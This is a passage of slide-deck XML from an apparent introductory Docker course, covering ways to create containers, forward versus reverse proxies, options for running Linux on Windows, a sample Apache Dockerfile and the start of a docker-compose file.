          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3512950" y="836625"/>
            <a:ext cx="3436200" cy="832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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105575" y="971775"/>
            <a:ext cx="8520600" cy="3942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6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker pull,create,start</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run( pull+create+start )</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker build</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	             Dockerfile</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker-compose  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>               docker-compose.yml</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1255" name="Google Shape;1255;p202"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440325" y="3639850"/>
            <a:ext cx="1191599" cy="797565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1256" name="Google Shape;1256;p202"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6043175" y="4212875"/>
            <a:ext cx="1651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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Image </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Build</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1257" name="Google Shape;1257;p202"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512661" y="4437414"/>
            <a:ext cx="807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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Look</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1258" name="Google Shape;1258;p202"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315125" y="1486250"/>
            <a:ext cx="1651250" cy="1651250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1259" name="Google Shape;1259;p202"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="1260" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4866050" y="3307275"/>
            <a:ext cx="1413600" cy="390000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1261" name="Google Shape;1261;p202"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7257851" y="3056175"/>
            <a:ext cx="419700" cy="491700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1262" name="Google Shape;1262;p202"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7544950" y="971775"/>
            <a:ext cx="1191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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Container</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1263" name="Google Shape;1263;p202"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7001337" y="302325"/>
            <a:ext cx="1874363" cy="534300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1260" name="Google Shape;1260;p202"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4707" l="9348" r="7773" t="7303"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6279650" y="3178025"/>
            <a:ext cx="978202" cy="1038499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1264" name="Google Shape;1264;p202"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2321350" y="2460987"/>
            <a:ext cx="1191599" cy="797565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1265" name="Google Shape;1265;p202"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2417486" y="3162839"/>
            <a:ext cx="807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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Look</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1266" name="Google Shape;1266;p202"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5748600" y="4110038"/>
            <a:ext cx="490800" cy="172800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1267" name="Google Shape;1267;p202"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4773150" y="2308650"/>
            <a:ext cx="2441700" cy="53700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1268" name="Google Shape;1268;p202"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3826150" y="1264725"/>
            <a:ext cx="3323700" cy="499500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1269" name="Google Shape;1269;p202"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892300" y="214050"/>
            <a:ext cx="6047700" cy="59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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4 Ways To Create Container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent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pic>
        <p:nvPicPr>
          <p:cNvPr id="1274" name="Google Shape;1274;p203"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="351200" y="1025125"/>
            <a:ext cx="8839200" cy="3575050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1275" name="Google Shape;1275;p203"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579350" y="262025"/>
            <a:ext cx="5867700" cy="49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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forward Proxy Vs Reverse Proxy</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1276" name="Google Shape;1276;p203"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7629975" y="152400"/>
            <a:ext cx="1361624" cy="388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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="463125"/>
            <a:ext cx="8520600" cy="1483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I have windows os, how can i work on linux os</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;216;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="733175" y="2181200"/>
            <a:ext cx="7571100" cy="2176800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-469900" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker </a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VirtualBox/VMWare</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get a Cloud Server</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFil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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3220">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1282" name="Google Shape;1282;p204"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="135294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2550">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM ubuntu:latest</a:t>
            </a:r>
            <a:endParaRPr sz="2550">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="135294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2550">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RUN apt-get update &amp;&amp; apt-get install -y apache2</a:t>
            </a:r>
            <a:endParaRPr sz="2550">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="135294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2550">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXPOSE 80  </a:t>
            </a:r>
            <a:endParaRPr sz="2550">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="135294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2550">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WORKDIR /var/www/html</a:t>
            </a:r>
            <a:endParaRPr sz="2550">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="135294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2550">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="135294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2550">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CMD ["apachectl", "-D", "FOREGROUND"]</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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2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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker-compose.yml</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3220">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1288" name="Google Shape;1288;p205"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>services:</a:t>
            </a:r>
            <a:endParaRPr sz="2850">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  service1:</a:t>
            </a:r>
            <a:endParaRPr sz="2850">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    build: .</a:t>
            </a:r>
            <a:endParaRPr sz="2850">
              <a:solidFill>
